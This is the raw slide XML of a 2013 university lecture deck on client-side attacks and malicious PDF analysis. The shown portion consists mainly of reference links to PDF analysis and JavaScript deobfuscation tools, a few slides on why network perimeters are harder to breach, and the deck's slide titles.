              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.adobe.com/devnet/pdf/pdf_reference.html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PDF Most Common File Type in Targeted Attacks ,http://www.f-secure.com/weblog/archives/00001676.html,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 – Cont.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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Didier Stevens, PDF Tools, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://blog.didierstevens.com/programs/pdf-tools/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Malicious PDF Analysis eBook, Didier Stevens,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Malicious PDF Analysis Workshop Advance Screening, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://didierstevenslabs.com/products/pdf-workshop.html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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Analysing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Malicious PDF Document, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.thegreycorner.com/2010/01/analysing-malicious-pdf-document.html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Mozilla Rhino Project, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en-US/docs/Rhino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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript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Deobfuscate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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org/files/111960/javascript-deobfuscate.pdf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JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deobfuscator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-us/firefox/addon/javascript-deobfuscator/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C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deobfuscate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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://deobfuscatejavascript.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript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DeObfuscator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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://www.patzcatz.com/unescape.htm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 – Cont.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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSUNPACK, A Generic JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unpacker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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://jsunpack.jeek.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, https://code.google.com/p/jsunpack-n/,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How to De-obfuscate JavaScript Code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.labnol.org/software/deobfuscate-javascript/19815/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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Wepawet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://wepawet.cs.ucsb.edu/index.php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OWASP, XSS Examples, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-site_Scripting_XSS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Meta Refresh, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.quackit.com/html/codes/meta_refresh.cfm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File Format tutorial exploits (PDF/Office), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://enc0de.blogspot.ru/2011/09/file-format-tutorial-exploits-pdfoffice.html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en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Code_injection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PDF, Let Me Count the Ways… , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/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From the Outside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From the outside it might look like this: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special-forces-w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71600"/>
            <a:ext cx="91440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Reason(s) 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Compromising a network perimeter today is much more difficult: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Better network design (Subnets, VLAN, DMZ, Quarantine Networks, etc)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Server hardening,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AV, IDS, IPS, UTM,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NewGen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Firewalls, etc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NSM (ex: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SecurityOnion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), SIEM (ex: OSSIM),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Improvement in software’s security,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Security Teams,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Others?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Reason(s) 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Compromising a network perimeter today is much more difficult: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Better network designs (Sub-netting, VLAN, DMZ, etc)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Server hardening,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AV, IDS, IPS, UTM,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NewGen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Firewalls, etc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NSM (ex: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SecurityOnion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), SIEM (ex: OSSIM),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Improvement in software’s security,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Security Teams,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Others?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xplosion 1 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="1981200"/>
            <a:ext cx="6172200" cy="38100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OK, ….</a:t>
            </a:r>
          </a:p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NOW WHAT???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4061</TotalTime>
  <Words>1930</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>330</Paragraphs>
  <Slides>65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Hacking Techniques &amp; Intrusion Detection</vt:lpstr>
      <vt:lpstr>All materials is licensed under a Creative Commons “Share Alike” license.</vt:lpstr>
      <vt:lpstr># whoami</vt:lpstr>
      <vt:lpstr>Client-Side Attacks</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Why Client-Side Attacks?</vt:lpstr>
      <vt:lpstr>From the Outside</vt:lpstr>
      <vt:lpstr>Reason(s) !!!</vt:lpstr>
      <vt:lpstr>Reason(s) !!!</vt:lpstr>
      <vt:lpstr>Check the Inside!</vt:lpstr>
      <vt:lpstr>Questions?</vt:lpstr>
      <vt:lpstr>Yes, it’s the …</vt:lpstr>
      <vt:lpstr>Client-Side Attacks</vt:lpstr>
      <vt:lpstr>Client-Side Attacks – Cont.</vt:lpstr>
      <vt:lpstr>User Environment</vt:lpstr>
      <vt:lpstr>User Environment</vt:lpstr>
      <vt:lpstr>How it works?</vt:lpstr>
      <vt:lpstr>Social Engineering?</vt:lpstr>
      <vt:lpstr>Hard to Secure</vt:lpstr>
      <vt:lpstr>User Categories</vt:lpstr>
      <vt:lpstr>User Categories</vt:lpstr>
      <vt:lpstr>Choosing the Target</vt:lpstr>
      <vt:lpstr>Choosing the Target – Cont.</vt:lpstr>
      <vt:lpstr>Don’t Forget!</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Delivery Techniques</vt:lpstr>
      <vt:lpstr>Delivery Techniques – Cont.</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Fake URL(s)</vt:lpstr>
      <vt:lpstr>HTML Stuff</vt:lpstr>
      <vt:lpstr>Others</vt:lpstr>
      <vt:lpstr>Fake Yahoo</vt:lpstr>
      <vt:lpstr>Fake Bank Website</vt:lpstr>
      <vt:lpstr>Fake Airline Reg.</vt:lpstr>
      <vt:lpstr>Fake Paypal Email</vt:lpstr>
      <vt:lpstr>Fake Game Email</vt:lpstr>
      <vt:lpstr>Fake Online Employment</vt:lpstr>
      <vt:lpstr>Fake OWA</vt:lpstr>
      <vt:lpstr>Malicious Content File</vt:lpstr>
      <vt:lpstr>PDF File Format</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>PDF Tools</vt:lpstr>
      <vt:lpstr>PDF Physical File Structure</vt:lpstr>
      <vt:lpstr>Hello-world.pdf</vt:lpstr>
      <vt:lpstr>Hello-world.pdf</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>Cont.</vt:lpstr>
      <vt:lpstr>PDFiD.py</vt:lpstr>
      <vt:lpstr>PDFiD.py – Clean File</vt:lpstr>
      <vt:lpstr>PDFiD.py – Malicious File</vt:lpstr>
      <vt:lpstr>pdf-parser.py</vt:lpstr>
      <vt:lpstr>Searching JS(s)</vt:lpstr>
      <vt:lpstr>Searching Filters</vt:lpstr>
      <vt:lpstr>Pass Stream Through Filters</vt:lpstr>
      <vt:lpstr>Other Tools</vt:lpstr>
      <vt:lpstr>Bypassing Techniques</vt:lpstr>
      <vt:lpstr>Today?</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Important Notes</vt:lpstr>
      <vt:lpstr>Assignment</vt:lpstr>
      <vt:lpstr>Special Thanks</vt:lpstr>
      <vt:lpstr>SUMMARY</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References – Cont.</vt:lpstr>
      <vt:lpstr>References – Cont.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Techniques and Intrusion Detection</dc:title>
  <dc:subject>Client-Side Attacks</dc:subject>
  <dc:creator>Dr. Ali Al-Shemery</dc:creator>
  <cp:lastModifiedBy>user1</cp:lastModifiedBy>
  <cp:revision>662</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-01-29T23:59:02Z</dcterms:modified>
</cp:coreProperties>
</file>